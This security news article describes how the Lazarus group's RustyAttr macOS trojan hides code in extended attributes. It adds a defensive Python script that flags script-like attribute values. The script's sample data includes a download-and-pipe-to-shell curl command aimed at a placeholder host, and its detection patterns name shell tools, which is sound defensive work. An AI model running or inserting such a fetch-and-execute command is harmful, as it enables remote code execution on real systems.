The Lazarus Advanced Persistent Threat (APT) group has been observed infiltrating macOS systems with malicious code hidden in custom extended attributes. The method, recently identified by Group-IB, lets the threat actor evade traditional security measures by keeping the malicious code out of sight of tools that only inspect a file's ordinary contents.
Extended attributes are normally used to store additional file metadata alongside a file's data; Lazarus is instead using them to conceal malware and to execute it on targeted systems. This is a notable shift in concealment tactics. The group's latest samples show it experimenting with extended attributes to avoid detection, reminiscent of a technique used in 2020 by the Bundlore adware, which hid its payload in resource forks. Lazarus's new approach relies on extended attributes, which are more versatile on modern macOS systems.
One of the malware variants developed by Lazarus is known as “RustyAttr,” a Trojan built with the Tauri framework. Tauri lets developers combine a web frontend with a Rust backend in a single application. Lazarus embeds the malicious code in an extended attribute and has the application read and execute it through Tauri's interface commands, so the payload never sits in a file that antivirus engines would normally scan, and many protections are bypassed. Notably, this malware remains undetected on VirusTotal.
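The concealment just described has a straightforward defensive counterpart: metadata attributes should hold metadata, never executable script. The following is an added example, not code from the article or from Group-IB, that triages a listing of a file's extended attributes and flags values that look like shell script or are implausibly large for metadata. The attribute allowlist, the size threshold, the sample file paths and the attribute name `com.example.hidden` are all constructed for the example; the `collect_xattrs` helper uses `os.listxattr`, which CPython provides on Linux (on macOS the same mapping can be built from the `xattr` command's output).

```python
import os
import re
from typing import Dict, List

# Attribute names that macOS and common tools write routinely. This allowlist is an
# assumption for the example; tune it to what your own fleet actually produces.
KNOWN_BENIGN = {
    "com.apple.quarantine",
    "com.apple.FinderInfo",
    "com.apple.ResourceFork",
    "com.apple.TextEncoding",
    "com.apple.metadata:kMDItemWhereFroms",
    "com.apple.metadata:_kMDItemUserTags",
    "com.apple.lastuseddate#PS",
    "com.apple.provenance",
}

# Byte patterns suggesting an attribute value is a script rather than metadata.
SCRIPT_MARKERS = {
    "shebang": re.compile(rb"\A#!\s*/"),
    "shell-tool": re.compile(rb"\b(?:curl|osascript|zsh|bash|sh|python3?)\b"),
    "download-and-run": re.compile(rb"\|\s*(?:sh|bash|zsh)\b"),
    "encoded-blob": re.compile(rb"base64|\beval\b"),
}

LARGE_VALUE_BYTES = 4096  # metadata is usually small; payloads are not (assumed threshold)


def score_attribute(name: str, value: bytes) -> List[str]:
    """Return the reasons an attribute looks suspicious, or [] if it looks like metadata.

    An unfamiliar name alone is weak evidence and is only reported when the value
    itself is also suspicious; a familiar name carrying script content is still flagged.
    """
    reasons: List[str] = []
    if name not in KNOWN_BENIGN:
        reasons.append(f"unexpected attribute name {name!r}")
    if len(value) > LARGE_VALUE_BYTES:
        reasons.append(f"value is {len(value)} bytes")
    for label, pattern in SCRIPT_MARKERS.items():
        if pattern.search(value):
            reasons.append(f"value matches {label}")
    content_hits = [r for r in reasons if r.startswith("value")]
    return reasons if content_hits else []


def triage_listing(listing: Dict[str, Dict[str, bytes]]) -> List[dict]:
    """Apply score_attribute to every (path, attribute, value) in a collected listing."""
    findings = []
    for path, attrs in listing.items():
        for name, value in attrs.items():
            reasons = score_attribute(name, value)
            if reasons:
                findings.append({"path": path, "attribute": name, "reasons": reasons})
    return findings


def collect_xattrs(root: str) -> Dict[str, Dict[str, bytes]]:
    """Walk a directory tree and read every extended attribute (Linux: os.listxattr)."""
    listing: Dict[str, Dict[str, bytes]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            try:
                names = os.listxattr(path, follow_symlinks=False)
            except OSError:
                continue
            attrs = {}
            for name in names:
                try:
                    attrs[name] = os.getxattr(path, name, follow_symlinks=False)
                except OSError:
                    continue
            if attrs:
                listing[path] = attrs
    return listing


# Constructed sample listing: one ordinary download and one file carrying a script in
# a custom attribute. Paths, values and the attribute name are made up for the example.
SAMPLE_LISTING = {
    "/Users/demo/Downloads/report.pdf": {
        "com.apple.quarantine": b"0083;66f1a2b3;Safari;",
        "com.apple.metadata:kMDItemWhereFroms": b"bplist00\x00",
    },
    "/Users/demo/Downloads/ProjectViewer.app/Contents/Resources/loader": {
        "com.example.hidden": b"#!/bin/sh\ncurl -fsSL https://stage.example.invalid/next.sh | sh\n",
    },
}

if __name__ == "__main__":
    for finding in triage_listing(SAMPLE_LISTING):
        print(finding["path"], finding["attribute"], "; ".join(finding["reasons"]))
```

Running the block reports only the `loader` file, citing the shebang, shell tool names and the pipe-to-shell pattern. The design point is that the name allowlist is deliberately not decisive: a script stored under a familiar name such as `com.apple.quarantine` is still flagged, because no legitimate metadata attribute should contain one.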
In addition to utilizing extended attributes, Lazarus’s malware employs deceptive tactics to distract users and evade detection. The research conducted by Group-IB revealed that the malware includes decoy elements such as PDFs related to project development or cryptocurrency, as well as fake system messages. These decoys are designed to mislead users while the malware operates in the background, fetching additional malicious scripts from Lazarus’s command-and-control (C2) servers.
Key findings from Group-IB's analysis: extended attributes are used for code smuggling; RustyAttr is a macOS trojan built with the Tauri framework; fake decoys and dialogs are deployed to deceive users; and the activity is attributed to Lazarus with moderate confidence.
Apple's Gatekeeper prevents unsigned or unnotarized applications from running, so an attack of this kind depends on that check being disabled or overridden. Users should keep Gatekeeper protections enabled and exercise caution when downloading files from unfamiliar sources; disabling them leaves macOS systems exposed to attacks like those orchestrated by Lazarus.
Cybersecurity experts emphasize the importance of staying vigilant and avoiding interactions with suspicious files or prompts. By remaining cautious and maintaining security measures, users can mitigate the risk of falling victim to sophisticated malware attacks.